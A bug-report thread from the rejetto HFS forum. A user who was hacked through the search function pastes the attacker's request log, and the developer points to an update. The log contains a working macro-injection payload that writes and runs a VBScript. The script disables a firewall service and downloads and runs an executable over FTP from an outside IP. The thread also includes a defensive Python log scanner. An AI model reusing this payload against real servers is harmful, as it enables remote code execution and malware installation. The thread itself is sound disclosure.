rejetto forum

Software => HFS ~ HTTP File Server => Bug reports => Topic started by: apanx on June 14, 2016, 09:18:05 PM

Title: Execution Exploit in search function
Post by: apanx on June 14, 2016, 09:18:05 PM
I am running HFS 2.3h and got hacked via the search function in HFS. The hacker was able to create and execute a VBScript, which failed because the file they attempted to download was not found.
See log below. There is a NUL character between ?search== and {.save|6.vbs...
I have disabled HFS at the moment and waiting for a fix.

2016-06-13 15:58:52 104.148.61.9 1740 Requested GET /?search== {.save|6.vbs|a=replace("set*objshell=createobject(""wscript.shell""):objshell.run(""%comspec%*/k*cmd*/c*net1*stop*sharedaccess&echo*open*43.160.195.78>*cmd.txt&echo*123>>*cmd.txt&echo*123>>*cmd.txt&echo*binary*>>*cmd.txt&echo*get*1.exe*>>*cmd.txt&echo*bye*>>*cmd.txt&ftp*-s:cmd.txt&ftp*-s:cmd.txt&start*1.exe*start*1.exe&del*cmd.txt""),1,true","*",Chr(32)):Execute(a):CreateObject("Scripting.FileSystemObject").GetFile(WScript.ScriptFullName).Delete.}
2016-06-13 15:58:52 104.148.61.9 1740 Served 3.9 K
2016-06-13 15:58:52 104.148.61.9 1740 Requested GET /?search== {.exec|6.vbs|.}

I have tried just entering the URL requests in my browser with and without the NUL after == and managed to create files in the HFS folder.

A similar exploit has been mentioned before in this forum
https://www.exploit-db.com/exploits/34668/
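A defender-side check for the pattern in the log above, added here as an example and not code from the thread or from HFS: it parses HFS-style "Requested GET" log lines, URL-decodes the path, and flags requests that carry a NUL byte or HFS macro syntax (`{.save`, `{.exec`) in the search parameter. The log line format and the sample lines are assumptions constructed from the post; the IP addresses are RFC 5737 documentation addresses, not real hosts.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines in the HFS layout shown in the post
# (date time ip port action ...). Line 1 carries a literal NUL after
# "search==", line 5 the same thing URL-encoded; line 4 is a benign search.
SAMPLE_LOG = """\
2016-06-13 15:58:52 192.0.2.10 1740 Requested GET /?search==\x00{.save|6.vbs|a=1.}
2016-06-13 15:58:52 192.0.2.10 1740 Served 3.9 K
2016-06-13 15:58:52 192.0.2.10 1740 Requested GET /?search== {.exec|6.vbs|.}
2016-06-13 16:01:03 192.0.2.11 1741 Requested GET /?search=holiday%20photos
2016-06-13 16:02:44 192.0.2.12 1742 Requested GET /?search=%00%7B.save%7Cx.vbs%7C.%7D
"""

# "<date> <time> <ip> <port> Requested GET <path>" (assumed HFS log layout)
LOG_RE = re.compile(r"^(\S+ \S+) (\S+) (\d+) Requested GET (.*)$")
# HFS macro opener "{." followed by the macro name
MACRO_RE = re.compile(r"\{\.\s*([A-Za-z0-9_]+)")
# Macro names the post shows being used to drop and run a script
HIGH_RISK_MACROS = {"save", "exec"}


def inspect_request(path):
    """Return findings for one request path: 'nul-byte' and 'macro:<name>'."""
    decoded = unquote(path)
    findings = []
    if "\x00" in decoded:
        findings.append("nul-byte")
    for name in MACRO_RE.findall(decoded):
        findings.append("macro:" + name.lower())
    return findings


def severity(findings):
    """'high' if a save/exec macro is present, 'suspicious' for any other hit."""
    names = {f.split(":", 1)[1] for f in findings if f.startswith("macro:")}
    if names & HIGH_RISK_MACROS:
        return "high"
    return "suspicious" if findings else "none"


def scan_log(text):
    """Return (timestamp, ip, findings, severity) for each flagged request line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # "Served ..." lines and anything not a request
        ts, ip, _port, path = m.groups()
        findings = inspect_request(path)
        if findings:
            hits.append((ts, ip, findings, severity(findings)))
    return hits
```

A legitimate search containing "{." is unlikely but possible, so treat the macro hit as a heuristic to review rather than a hard block; the NUL byte in a query string has no legitimate use and is the stronger signal.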
Title: Re: Execution Exploit in search function
Post by: Mars on June 14, 2016, 09:59:59 PM
Thanks for the report, rejetto is beginning to address the issue
Title: Re: Execution Exploit in search function
Post by: rejetto on June 14, 2016, 10:13:37 PM
I'm sorry for the problem.
I'm working on it.
Title: Re: Execution Exploit in search function
Post by: rejetto on June 14, 2016, 10:58:23 PM
please update to 2.3i
Title: Re: Execution Exploit in search function
Post by: Fysack on September 30, 2017, 11:19:40 PM
 ;D ;D ;D